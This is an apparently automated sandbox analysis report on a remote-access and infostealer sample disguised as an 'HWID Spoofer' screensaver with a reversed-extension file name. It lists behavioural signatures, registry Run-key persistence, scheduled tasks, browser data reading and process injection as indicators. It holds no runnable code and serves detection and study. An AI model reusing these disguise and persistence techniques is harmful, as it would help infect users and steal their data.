Malware Analysis Report

2025-01-19 06:05

Sample ID 231214-txwxcagea8
Target HWID Spoofer Resou‮nls..scr
SHA256 8177a82bb9f46bb3a6b01b59eb6fbfc1bfebd9ba5147a5685ee49d6a9aa22002
Tags
upx asyncrat irata zgrat winlogoewg winlozb infostealer persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

8177a82bb9f46bb3a6b01b59eb6fbfc1bfebd9ba5147a5685ee49d6a9aa22002

Threat Level: Known bad

The file HWID Spoofer Resou‮nls..scr was found to be: Known bad.

Malicious Activity Summary

upx asyncrat irata zgrat winlogoewg winlozb infostealer persistence rat spyware stealer trojan

Detect ZGRat V1

Irata payload

AsyncRat

ZGRat

Irata

Async RAT payload

Downloads MZ/PE file

Blocklisted process makes network request

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

UPX packed file

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Unsigned PE

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Creates scheduled task(s)

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-14 16:26

Signatures

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2023-12-14 16:26

Reported

2023-12-14 16:29

Platform

win10v2004-20231127-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr" /S

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1


Irata

trojan infostealer rat irata

Irata payload


ZGRat

rat zgrat

Async RAT payload

rat

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe | N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\F2g3 = "C:\\Users\\Admin\\AppData\\Roaming\\F2g3\\F2g3.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gbn1 = "C:\\Users\\Admin\\AppData\\Roaming\\Gbn1\\Gbn1.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe" | C:\Users\Admin\AppData\Local\Temp\b80jkh876yhsdda23kjlkh2.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Enumerates processes with tasklist

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 5064 wrote to memory of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 1020 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\System32\sihclient.exe
PID 5064 wrote to memory of 1020 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\System32\sihclient.exe
PID 1020 wrote to memory of 3912 | N/A | C:\Windows\System32\sihclient.exe | C:\Windows\SysWOW64\tasklist.exe
PID 1020 wrote to memory of 3912 | N/A | C:\Windows\System32\sihclient.exe | C:\Windows\SysWOW64\tasklist.exe
PID 5064 wrote to memory of 4512 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 4512 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 3912 wrote to memory of 4824 | N/A | C:\Windows\SysWOW64\tasklist.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3912 wrote to memory of 4824 | N/A | C:\Windows\SysWOW64\tasklist.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5064 wrote to memory of 3584 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 3584 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 4512 wrote to memory of 1064 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WerFault.exe
PID 4512 wrote to memory of 1064 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WerFault.exe
PID 3584 wrote to memory of 4944 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe
PID 3584 wrote to memory of 4944 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe
PID 5064 wrote to memory of 2800 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 2800 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 1064 wrote to memory of 4624 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4944 wrote to memory of 3744 | N/A | C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1064 wrote to memory of 4624 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4944 wrote to memory of 3744 | N/A | C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 3448 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe
PID 2800 wrote to memory of 3448 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe
PID 2672 wrote to memory of 1928 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Conhost.exe
PID 2672 wrote to memory of 1928 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Conhost.exe
PID 5064 wrote to memory of 4232 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 4232 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr | C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 4600 | N/A | C:\Windows\System32\Conhost.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 4600 | N/A | C:\Windows\System32\Conhost.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3448 wrote to memory of 4440 | N/A | C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3448 wrote to memory of 4440 | N/A | C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1668 wrote to memory of 4248 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe
PID 1668 wrote to memory of 4248 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe
PID 4248 wrote to memory of 1596 | N/A | C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4248 wrote to memory of 1596 | N/A | C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 2980 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe
PID 4824 wrote to memory of 2980 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe
PID 4824 wrote to memory of 2980 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe
PID 2980 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2980 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2980 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2980 wrote to memory of 1808 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\SysWOW64\cmd.exe
PID 2980 wrote to memory of 1808 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\SysWOW64\cmd.exe
PID 2980 wrote to memory of 1808 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\SysWOW64\cmd.exe
PID 1808 wrote to memory of 3248 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1808 wrote to memory of 3248 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1808 wrote to memory of 3248 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2980 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
